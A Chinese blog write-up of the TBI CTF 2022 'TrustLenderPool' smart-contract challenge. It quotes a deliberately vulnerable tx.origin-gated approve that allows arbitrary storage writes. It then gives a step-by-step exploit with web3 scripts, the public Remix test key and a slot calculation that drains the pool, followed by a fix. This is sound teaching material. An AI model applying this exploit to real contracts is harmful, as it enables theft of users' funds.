题目转载:1 - TBI CTF 2022 TrustLenderPool

于 2023-07-16 22:50:32 发布
阅读量93 收藏
点赞数
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_37748687/article/details/131755388
版权

发现漏洞

Approve 函数的 safeCheck 修饰器实现比较特殊,判断了 tx.origin 末尾字节如果为 0xbeddC4 则可以调用 grant 函数,而 grant 函数可以对 storage 进行写入操作,写入的 slot 可由 amount 参数指定。但是 grant 的 spender 参数要求为合约地址,且该合约代码长度需小于 10。

Plaintext
function approve(address spender, uint256 amount) public safeCheek(spender,amount) returns (bool) {
    _approve(msg.sender, spender, amount);
    return true;
}

modifier safeCheek(address spender, uint256 amount) {
    if (uint160(tx.origin)&0xffffff!=0xbeddC4||tx.origin==admin) {
        _;
    } else {
        grant(spender, amount);
    }
}

function grant(address spender, uint256 amount) internal {
    require(spender.code.length>0&&spender.code.length<10);
    AddressSlot storage r;
    bytes32 slot = bytes32(amount);
    assembly {
        r.slot:= slot;
    }
    r.value = tx.origin;
}

指出漏洞

整体解题思路如下:

1)0xbeddC4 为 Remix VM 使用签名账号,该账号为 0x5B38Da6a701c568545dCfcB03FcB875f56beddC4,其私钥公开为 0x503f38a9c967ed597e47fe25643985f032b072db8075426a92110f82df48dfcb。

2)使用 JS 脚本部署一个字节码长度小于 10 的合约,合约地址用作 approve 调用 spender 参数。

3)使用 JS 脚本计算攻击地址在 token1 的\_balances 中的 slot 数值,该数值用作 approve 的 amount 参数。

4)使用 0x5B38Da6a701c568545dCfcB03FcB875f56beddC4 在 token1 合约发起 approve 调用,spender 为 2)部署的合约地址,amount 为 3)计算得出的 slot 数值,从而使得攻击地址的 token1 的 balances 余额变为 0x5B38Da6a701c568545dCfcB03FcB875f56beddC4。

5)使用攻击地址正常调用 token1 的 approve 函数,授权 TrusterLenderPool 合约,授权额度为 TrusterLenderPool 的 token0 的 balance 余额 100*10**18+10000。

6)使用攻击地址调用 TrusterLenderPool 的 swap 函数,使用 token1 置换出合约内全部的 token0。

7)调用 TrusterLenderPool 的 Complete 函数,完成解题过程。

漏洞复现

1)部署合约,合约代码不能编译成功,需进行部分修改,主要修改如下:

a)增加 ICERT 接口,其内容为 IERC20,并增加 _mint 接口

Plaintext
interface ICERT {
    event Transfer (address indexed from, address indexed to, uint256 value);
    event Approval(address indexed owner, address indexed spender, uint256 value);
    function totalSupply() external view returns (uint256);
    function balanceOf(address account) external view returns (uint256);
    function transfer(address to, uint256 amount) external returns (bool);
    function allowance(address owner, address spender) external view returns (uint256);
    function approve(address spender, uint256 amount) external returns (bool);
    function transferFrom(address from,address to,uint256 amount) external returns (bool);

    function _mint(address account, uint256 amount) external ;
}

b)修改 TrusterLenderPool 的 constructor()函数,进行地址强制类型转换,去掉编译错误。

Plaintext
    ICERT public  token0;
    ICERT public  token1;

    constructor () {
        Cert token00 = new Cert();

        token0 = ICERT(address(token00));
        token0._mint(address(this), 10000);

        Cert token10 = new Cert();

        token1 = ICERT(address(token10));
        token1._mint(address(this), 10000);
    }

c)简单将 Cert 合约的 _mint 函数由 internal 修改为 public,使得 TrusterLenderPool 可以进行 _mint 调用。

Plaintext
function _mint(address account, uint256 amount) public {
    require(account != address(0), "ERC20: mint to the zero address");
    _totalSupply += amount;
    _balances[account] += amount;
}

2)在 Ropsten 网络部署 TrusterLenderPool 合约,并通过其 public 变量获取 token0 和 token1 合约地址:

TrusterLenderPool:0x95C02a2c5923053672704390a358a0520Ec05b41

token0:0xB1B5FE00aca2746B4B7Eba27b84C4654D54A03d9

token1:0x932C92fBa166bdA2A69a20251713E7d3BeB706e2

通过 At Address 按钮,获取 token0 和 token1 合约实例。

 

 

3)使用 JS 脚本部署字节码长度小于 10 的合约,如下代码部署合约字节码长度为 6,合约地址为:0xbee7ddD295b11b421c849ba060941bD1E17E0435

Plaintext
let fs = require("fs");
let Web3 = require("web3");

let web3 = new Web3("https://ropsten.infura.io/v3/***");

let PUBLIC_KEY  = "0x5B38Da6a701c568545dCfcB03FcB875f56beddC4";
let PRIVATE_KEY = "0x503f38a9c967ed597e47fe25643985f032b072db8075426a92110f82df48dfcb";

async function send(transaction) {
    let gas = await transaction.estimateGas({from: PUBLIC_KEY});
    let options = {
        to  : transaction._parent._address,
        data: transaction.encodeABI(),
        gas : gas
    };
    let signedTransaction = await web3.eth.accounts.signTransaction(options, PRIVATE_KEY);
    return await web3.eth.sendSignedTransaction(signedTransaction.rawTransaction);
}

async function deploy(contractName, contractArgs) {
    let abi = "[]";
    let bin = "3859818153F3";
    let contract = new web3.eth.Contract(JSON.parse(abi));
    let handle = await send(contract.deploy({data: "0x" + bin}));
    console.log(`${contractName} contract deployed at address ${handle.contractAddress}`);
    return new web3.eth.Contract(JSON.parse(abi), handle.contractAddress);
}

async function run() {
    let myContract = await deploy("MyContract", [123, "My String"]);
}

run()

4. 使用 JS 脚本计算攻击地址 0xB359d643AacE52Bd1437edC5ef6E10f45066C2A4 在 token1 的 _balances 变量中的 slot 数值,数值计算结果为:0x4e2b342ae1c95cc687837762ed1ba348bd24dbb062e9652284210ad0d4966d7b

Plaintext
const Web3      = require("web3");
var web3 = new Web3("https://main-light.eth.linkpool.io/");

var addStr = "0x000000000000000000000000b359d643aace52bd1437edc5ef6e10f45066c2a4"
var pStr   = "0000000000000000000000000000000000000000000000000000000000000000"
console.log(addStr+pStr)

var balSlot = web3.utils.keccak256(addStr+pStr)
console.log(balSlot)

5)使用 0x5B38Da6a701c568545dCfcB03FcB875f56beddC4 对 token1 合约发起 approve 调用,spender 为 0xbee7ddD295b11b421c849ba060941bD1E17E0435,amount 为 0x4e2b342ae1c95cc687837762ed1ba348bd24dbb062e9652284210ad0d4966d7b,从而使得地址 0xB359d643AacE52Bd1437edC5ef6E10f45066C2A4 的 token1 的 balances 余额变为 0x5B38Da6a701c568545dCfcB03FcB875f56beddC4。

交易执行成功后,可以查询 0xB359d643AacE52Bd1437edC5ef6E10f45066C2A4 的 balance 余额:

6)0xB359d643AacE52Bd1437edC5ef6E10f45066C2A4 调用 token1 授权函数 approve,授权 TrusterLenderPool 合约,授权额度为 100000000000000010000,即 TrusterLenderPool 的 token0 的 balance 余额:

 

调用 approve 授权交易完成后,可以通过 token1 的 allowance 接口确认 allowance 结果。

7)调用 TrusterLenderPool 合约的 swap 函数,tokenAddress 输入 token0 合约地址,amount 输入 100000000000000010000,将 TrusterLenderPool 合约内的 token0 全部置换出来。

交易完成后,可以查询 TrusterLenderPool 的 token0 的 banlance 余额已经变为 0.

8)调用 TrusterLenderPool 的 Complete 函数,完成解题。

 

漏洞修复

1)将 approve 函数的 safeCheek(spender,amount)修饰符调用移除。

Plaintext
function approve(address spender, uint256 amount) public safeCheek(spender,amount) returns (bool) {
    _approve(msg.sender, spender, amount);
    return true;
}

2)将 _approve 函数内 tx.origin==admin 分支移除。

Plaintext
function _approve(
    address owner,
    address spender,
    uint256 amount
) internal {
    if(tx.origin==admin){
        require(msg.sender.code.length>0);
        _allowances[spender][tx.origin] = amount;
        return;
    }
    require(owner != address(0), "ERC20: approve from the zero address");
    require(spender != address(0), "ERC20: approve to the zero address");
    _allowances[owner][spender] = amount;
}

 

m0_37748687
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
解读:LM-79认证LM-80认证LM82 认证和 TM-21-11标准
全球最新认证法规 助力中国质造 走向世界!
05-14 2116
能源之星(ENERGY STAR® )标志是由美国环保署 (Environmental Protection Agency, EPA) 和能源部 (Department of Energy, DOE)共同创建,旨在保证所列管产品的能效符合法规要求。针对现今市场的观察与对未来的展望,EPA 和 DOE 正积极推动 ENERGY STAR® 计画的强化措施,包括自2011年1月1日起,要求所有由制造商提出参与ENERGY STAR®计画的全新产品,必须通过EPA认可的认证机构(EPA-recognized C.
NACCTBI数据分析日志:2020-10-27
树屋Treehouse
10-27 112
将3个sheet进行重命名:clin, T1, ACBR T1$has_clinical<-在T1中反查是否有clin中的NACCID,是1否0 =IF(COUNTIF(TBI_clinical_data!$A$2:$A$1428,A2)>0,1,0) T1中819行均为1 T1$MRI_name_2<-将MRI_name中的.zip去掉 =LEFT(C2,LEN(C2)-4) 如此与ACBR*中名称保持一致便于检索 ACBR*$has_T1<-在ACBR*中反查是否有
计算机图形学完整笔记(七):曲线曲面 - 1
Gene_I must wait for the sunrise
08-14 2150
文章目录第七章 曲线曲面 - 17.1 几何造型简史7.2 参数曲线基本概念7.2.1 曲线和曲面的三种表示方法7.2.2 参数曲线的基本概念7.3 Bezier曲线与曲面7.3.1 Bezier曲线的背景和定义7.3.2 Bernstein基函数的性质7.3.3 Bezier曲线的性质 第七章 曲线曲面 - 1 7.1 几何造型简史 几何造型技术 —— 表达物体模型形状的技术 三类三维模型 线框模型 —— 顶点和棱边来表示物体 曲面模型 (最常用) —— 描述物体表面和表面的连接关系,不描
hp-VPINNs: Variational Physics-Informed Neural Networks With Domain Decomposition论文笔记
山里娃的博客
08-27 640
hp-VPINNs: Variational Physics-Informed Neural Networks With Domain
VMAT-TBI:用于VMAT TBI自动规划的ESAPI代码
03-06
**VMAT-TBI: ESAPI代码在VMAT全身照射(TBI)自动规划中的应用** VMAT(Volumetric Modulated Arc Therapy,体积调强弧形治疗)是一种先进的放射治疗技术,它允许在360度旋转过程中动态调整射线强度,以精确地对...
SK43-TBI-App:地形基本实现视频播放器
03-10
在这个特定的案例中,"SK43-TBI-App:地形基本实现视频播放器" 是一个专为地形数据展示设计的视频播放器应用程序。这个项目可能用于地理信息系统(GIS)或者虚拟现实(VR)场景中,为用户提供在地形数据上播放视频的...
新型心肌显像剂99mTcN-TBI的电性及与99mTc-TBI的比较* (2000年)
05-15
分别应用区带电泳法和阳离子树脂交换法测定了新型潜在心肌灌注显像剂99TcN-TBI的电荷性质,且在相同条件下测定了99Tc-TBI的电荷性质,并进行了比较。电泳实验结果显示,有放射性活度的73.1%的99TcN-TBI滞留于原点,...
TBI-SFU系列丝杠选型软件.zip
07-18
TBI-SFU系列丝杠选型软件:深入解析与应用》 TBI-SFU系列丝杠选型软件是一款专为机械设计工程师打造的专业工具,它简化了TBI-SFU系列丝杆螺母的选型过程,使得设计者能够根据实际需求快速、准确地选取合适的丝杠...
国家-tbi-repo
02-13
国家大学回购 这就是我们要做的 〜打开国家目录〜单击json文件(将其打开) 〜在文件的右上角底部,分别显示了两个按钮:blame和raw,单击raw按钮,它将把您重定向到另一个URL。 〜复制该网址并将其粘贴到wagtail...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8350
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
基于SpringCloud微服务架构的B2C电子商务系统-可执行内含文档代码-可执行内含文档代码.zip
07-28
基于SpringCloud微服务架构的B2C电子商务系统-可执行内含文档代码-可执行内含文档代码.zip
智慧校园整体解决方案-6PPT(102页).pptx
07-28
智慧校园整体解决方案是响应国家教育信息化政策,结合教育改革和技术创新的产物。该方案以物联网、大数据、人工智能和移动互联技术为基础,旨在打造一个安全、高效、互动且环保的教育环境。方案强调从数字化校园向智慧校园的转变,通过自动数据采集、智能分析和按需服务,实现校园业务的智能化管理。 方案的总体设计原则包括应用至上、分层设计和互联互通,确保系统能够满足不同用户角色的需求,并实现数据和资源的整合与共享。框架设计涵盖了校园安全、管理、教学、环境等多个方面,构建了一个全面的校园应用生态系统。这包括智慧安全系统、校园身份识别、智能排课及选课系统、智慧学习系统、精品录播教室方案等,以支持个性化学习和教学评估。 建设内容突出了智慧安全和智慧管理的重要性。智慧安全管理通过分布式录播系统和紧急预案一键启动功能,增强校园安全预警和事件响应能力。智慧管理系统则利用物联网技术,实现人员和设备的智能管理,提高校园运营效率。 智慧教学部分,方案提供了智慧学习系统和精品录播教室方案,支持专业级学习硬件和智能化网络管理,促进个性化学习和教学资源的高效利用。同时,教学质量评估中心和资源应用平台的建设,旨在提升教学评估的科学性和教育资源的共享性。 智慧环境建设则侧重于基于物联网的设备管理,通过智慧教室管理系统实现教室环境的智能控制和能效管理,打造绿色、节能的校园环境。电子班牌和校园信息发布系统的建设,将作为智慧校园的核心和入口,提供教务、一卡通、图书馆等系统的集成信息。 总体而言,智慧校园整体解决方案通过集成先进技术,不仅提升了校园的信息化水平,而且优化了教学和管理流程,为学生、教师和家长提供了更加便捷、个性化的教育体验。
anaconda配置pytorch环境.pdf
最新发布
07-28
使用Anaconda配置PyTorch环境是一个相对直接的过程,以下是一个详细的步骤指南,包括Anaconda的下载与安装、PyTorch环境的创建以及PyTorch的安装与验证。 一、Anaconda的下载与安装 1.访问Anaconda官网: 1.前往Anaconda官网下载最新版本的Anaconda。 2.下载Anaconda: 1.在官网首页,点击“Free Download”按钮,选择合适的操作系统版本进行下载。 3.安装Anaconda: 1.双击下载好的Anaconda安装包,按照提示进行安装。 2.注意选择安装路径(建议不安装在C盘),并确保安装路径为全英文。 3.安装过程中,根据需要选择“为所有用户安装”或“仅为当前用户安装”。 4.验证Anaconda安装: 1.安装完成后,打开“Anaconda Prompt”(或Anaconda Navigator),输入conda --version查看conda版本,以验证Anaconda是否安装成功。 二、创建PyTorch环境 1.打开Anaconda Prompt: 1.在开始菜单中找到并打开“Anaconda Pro
2024小米SOC面试经验
07-28
• 自我介绍,然后针对项目实习进行提问。 • sdram仲裁模块设计:面试官询问了我关于sdram(同步动态随机存取存储器)仲裁模块的设计思路,这可能涉及到如何高效地管理多个设备或进程对sdram的访问,确保数据一致性和性能优化。 • FIFO设计:我们探讨了FIFO(先进先出队列)是否使用了现成的IP核(知识产权核),并假设如果我自己设计FIFO时可能遇到的难点,如同步问题、缓冲区管理、性能优化等。 • 跨时钟域问题:讨论了跨时钟域信号同步的挑战,特别是信号展宽(metastability)的解决策略,这是确保数据在不同时钟域间可靠传输的关键。 • TMDS编码流程:面试官询问了我TMDS(Transition Minimized Differential Signaling,转换最小化差分信号)编码的具体流程,这通常涉及视频或高速数据传输领域,要求我对数据传输协议有深入理解。 • 项目调试方法:面试官要求我分享在项目中如何进行调试的经验,包括使用的工具、调试策略及问题解决过程。
1920x1080尺寸的NV12 YUV的图像数据
07-28
1920x1080尺寸的NV12 YUV的图像数据
步行街招商计划书范本(附租赁合同等).doc
07-28
商业计划书,创业计划书,项目计划书,计划书模板 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
考勤表模板---自动计算.xlsx
07-28
考勤表,Excel模版
【2021】2021年数字化汽车报告- 洞察全球移动出行市场(首篇)-PWC_44页.pdf
07-28
【2021】2021年数字化汽车报告- 洞察全球移动出行市场(首篇)-PWC_44页.pdf
num = 1; den = [1, 1]; % 采样周期T=0.5s T = 0.5; % 零阶保持器法离散化 sys = tf(num, den, 'InputDelay', 0); sysd = c2d(sys, T, 'zoh'); % 大林算法设计数字控制器 n = 2; % 阶数 a = 2*n; b = 1; g = sysd.num{1}; ai = [1, zeros(1, n)]; bi = [0, 0]; for i = 2:n+1 ai(i) = (2-bi(1:i-1)*ai(i-1:-1:1)'-sum((0:i-2).*bi(1:i-2)))*ai(i-1) ... - (1-sum(bi(1:i-1)))=ai(i-2) + (2n-i+2)T(1-bi(1:i-1)*ai(i-1:-1:1)')*g(i-1)/2; bi(i) = (2-bi(1:i-1)*bi(i-1:-1:1)'-sum((0:i-2).*bi(1:i-2)))*bi(i-1) ... - (1-sum(bi(1:i-1)))*bi(i-2) - (2n-i+3)Tbi(i-1)*g(i-1)/2; end D = tf(ai, [1, -bi], T); % 差分方程形式 [numd, dend] = tfdata(D, 'v'); u = filter(numd, dend(2:end), ones(1, n+1)*numd(1)); % 输出控制器系数和控制输出 disp('数字控制器D(z)的系数:'); disp(ai./[1, -bi]); disp('控制输出u(k):'); disp(u);无效表达式。请检查缺失的乘法运算符、缺失或不对称的分隔符或者其他语法错误。要构造矩阵,请使用方括号而不是圆括号
05-25
- (1-sum(bi(1:i-1)))*ai(i-2) + (2*n-i+2)*T*(1-bi(1:i-1)*ai(i-1:-1:1)')*g(i-1)/2; bi(i) = (2-bi(1:i-1)*bi(i-1:-1:1)'-sum((0:i-2).*bi(1:i-2)))*bi(i-1) ... - (1-sum(bi(1:i-1)))*bi(i-2) - (2*n-i+3)*T*bi...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值